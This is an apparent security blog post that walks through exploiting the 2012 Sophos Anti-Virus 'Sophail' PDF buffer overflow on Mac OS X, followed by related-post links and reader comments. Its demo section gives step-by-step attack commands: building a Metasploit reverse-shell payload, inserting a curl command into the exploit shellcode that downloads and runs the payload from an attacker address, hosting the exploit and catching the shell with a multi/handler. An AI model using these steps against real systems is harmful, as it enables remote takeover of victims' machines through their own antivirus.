aka wow on ZATAZ.com
Sophos Anti-Virus Sophail PDF Vulnerability Metasploit Payload Demo
Timeline :
Vulnerabilities reported to vendor by Tavis Ormandy the 2012-09-10
Public release of the vulnerabilities by Tavis Ormandy the 2012-11-05
PoC provided by Tavis Ormandy the 2012-10-02
PoC provided by :
Tavis Ormandy
Reference(s) :
Full Disclosure
Sophail: Applied attacks against Sophos Antivirus
Sophos products and Tavis Ormandy
VU#662243
Affected version(s) :
Sophos products for Mac OS X
Sophos products for Windows
Sophos products for Linux
…
Tested on Mac OS X 10.8.2 with :
Sophos Anti-Virus for Mac Home Edition
Description :
This PoC demonstrate one of the Sophos products vulnerabilities reported by Tavis Ormandy. This PoC exploit a PDF stack buffer overflow vulnerability present in Sophos onaccess scanner.
Demo :
1) Create a Mac OS X Metasploit payload: msfpayload osx/x86/shell_reverse_tcp LHOST=192.168.178.26 X > mac_os_x_payload 2) Modify Sophail shellcode.asm file with, for example: .command: db "curl -s http://192.168.178.26/mac_os_x_payload > mac_os_x_payload | chmod u+x mac_os_x_payload && ./mac_os_x_payload", 0 3) Make 4) Upload index.html, exploit.bin and exploit.png on a web server 5) Initiate a Metasploit multihandler use exploit/multi/handler set PAYLOAD osx/x86/shell_reverse_tcp set LHOST 192.168.178.26 exploit -j 6) On the target surf index.html file 7) Exploit the sessionsession -i 1 id /sbin/ifconfig uname -a
I recommend you to read these related posts
- 10 of 10 malwares detected by Mac Sophos Anti-Virus are false positives. Does yours?
- Metasploit Meterpreter race condition against Avira anti-virus
- Metasploit Meterpreter race condition against Emsisoft Anti-Malware
- Clamav antivirus blocking Yahoo, Apple HTML.IFrame-39
- CVE-2012-4284 Setuid Viscosity Privilege Escalation Metasploit Demo
- CVE-2012-3485 Setuid Tunnelblick Privilege Escalation Metasploit Demo
- CVE-2010-3867 : ProFTPD IAC Remote Root Exploit
- CVE-2011-3230 Apple Safari file:// Arbitrary Code Execution Metasploit Demo
- Metasploit Exploitation Scenarios – Scenario 3 Astaro Security Gateway & Dr.Web Antivirus
- Squiggle 1.7 SVG Browser Java Code Execution Metasploit Demo
Logging In...
[...] exploit, die inmiddels ook in ‘webversie’ is vertaald, zoals onderstaande video van Eric Romang laat [...]
MSF installed again, it was fine after installation. After reboot, the same error, any ideas?
[...] A demonstration of the Sophos Anti-Virus Sophail PDF Vulnerability, the worst of the vulnerabilities uncovered by Ormandy, can be found here as a Metasploit payload. [...]
[...] dem Newsletter der SecLists.Org Security Mailing List veröffentlicht. Inzwischen gibt es auch ein Modul für das Sicherheitswerkzeug [...]
[...] dem Newsletter der SecLists.Org Security Mailing List veröffentlicht. Inzwischen gibt es auch ein Modul für das Sicherheitswerkzeug [...]
Irrelevant question: if you were able to solve the “[-] Exploit failed: Can not add a new key into hash during iteration”? Thanks
Hi amaciek,
My only solution was to reinstall everything
Regards